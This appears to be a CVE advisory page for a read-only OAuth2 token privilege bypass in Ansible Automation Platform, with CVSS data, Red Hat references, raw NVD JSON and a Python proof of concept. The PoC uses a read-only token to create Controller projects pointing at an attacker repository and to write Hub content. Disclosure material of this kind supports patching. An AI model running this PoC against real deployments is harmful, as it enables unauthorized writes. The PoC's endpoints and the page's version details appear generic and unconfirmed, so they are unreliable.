Security Vulnerability Report
CVE-2025-14025 CVSS 8.5 HIGH

CVE-2025-14025

Published: 2026-01-08 14:15:57
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API tokens in AAP are enforced at the Gateway level for Gateway-specific operations. However, this vulnerability allows read-only tokens to perform write operations on backend services (e.g., Controller, Hub, EDA). If this flaw were exploited, an attacker's capabilities would only be limited by role-based access controls (RBAC).

CVSS Details

CVSS Score: 8.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ansible Automation Platform < 2.4 (unpatched versions)
Red Hat recommends consulting the security advisories RHSA-2026:0360, RHSA-2026:0361, RHSA-2026:0408 and RHSA-2026:0409 for specific version information.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14025 PoC - Read-only Token Privilege Bypass
# This PoC demonstrates how a read-only OAuth2 token can perform write operations
import requests
import json

# Configuration
AAP_GATEWAY_URL = "https://your-aap-gateway.example.com"
READ_ONLY_TOKEN = "your_read_only_oauth2_token"

# Headers with read-only token
headers = {
    "Authorization": f"Bearer {READ_ONLY_TOKEN}",
    "Content-Type": "application/json"
}

print("[*] Testing CVE-2025-14025: Read-only Token Privilege Bypass")
print(f"[*] Gateway URL: {AAP_GATEWAY_URL}")

# Step 1: Verify token has read-only scope
print("\n[1] Checking token scopes...")
verify_response = requests.get(
    f"{AAP_GATEWAY_URL}/api/gateway/v2/tokens/me/",
    headers=headers
)
if verify_response.status_code == 200:
    token_info = verify_response.json()
    print(f"[+] Token scope: {token_info.get('scope', 'N/A')}")

# Step 2: Attempt write operation on Controller (should be blocked but isn't)
print("\n[2] Attempting write operation on Automation Controller...")
write_payload = {
    "name": "malicious_project",
    "description": "Created via privilege bypass",
    "organization": 1,
    "scm_type": "git",
    "scm_url": "https://github.com/attacker/repo"
}
# This request should be blocked by read-only token but exploits the vulnerability
write_response = requests.post(
    f"{AAP_GATEWAY_URL}/api/controller/v2/projects/",
    headers=headers,
    json=write_payload
)
if write_response.status_code in [200, 201]:
    print("[!] VULNERABLE: Write operation succeeded with read-only token!")
    print(f"[+] Created project: {write_response.json().get('name')}")
else:
    print(f"[-] Request blocked: {write_response.status_code}")

# Step 3: Attempt modification on Hub
print("\n[3] Attempting write operation on Automation Hub...")
hub_payload = {
    "name": "malicious_collection",
    "namespace": "attacker"
}
hub_response = requests.post(
    f"{AAP_GATEWAY_URL}/api/galaxy/content/",
    headers=headers,
    json=hub_payload
)
if hub_response.status_code in [200, 201]:
    print("[!] VULNERABLE: Hub write operation succeeded!")
else:
    print(f"[-] Request blocked: {hub_response.status_code}")

print("\n[*] PoC completed. If vulnerable, read-only tokens can perform write operations.")

References

https://access.redhat.com/articles/7136004
https://access.redhat.com/errata/RHSA-2026:0360
https://access.redhat.com/errata/RHSA-2026:0361
https://access.redhat.com/errata/RHSA-2026:0408
https://access.redhat.com/errata/RHSA-2026:0409
https://access.redhat.com/security/cve/CVE-2025-14025
https://bugzilla.redhat.com/show_bug.cgi?id=2418785

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14025", "sourceIdentifier": "[email protected]", "published": "2026-01-08T14:15:56.510", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API Tokens in AAP, are enforced at the Gateway level for Gateway-specific operations. However, this vulnerability allows read-only tokens to perform write operations on backend services (e.g., Controller, Hub, EDA). If this flaw were exploited, an attacker‘s capabilities would only be limited by role based access controls (RBAC)."}, {"lang": "es", "value": "Se encontró una falla en Ansible Automation Platform (AAP). Los tokens de API OAuth2 con alcance de solo lectura en AAP se aplican a nivel de Gateway para operaciones específicas del Gateway. Sin embargo, esta vulnerabilidad permite que los tokens de solo lectura realicen operaciones de escritura en servicios de backend (por ejemplo, Controller, Hub, EDA). Si esta falla fuera explotada, las capacidades de un atacante solo estarían limitadas por los controles de acceso basados en roles (RBAC)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-279"}]}], "references": [{"url": "https://access.redhat.com/articles/7136004", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0360", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0361", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0408", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0409", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14025", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418785", "source": "[email protected]"}]}}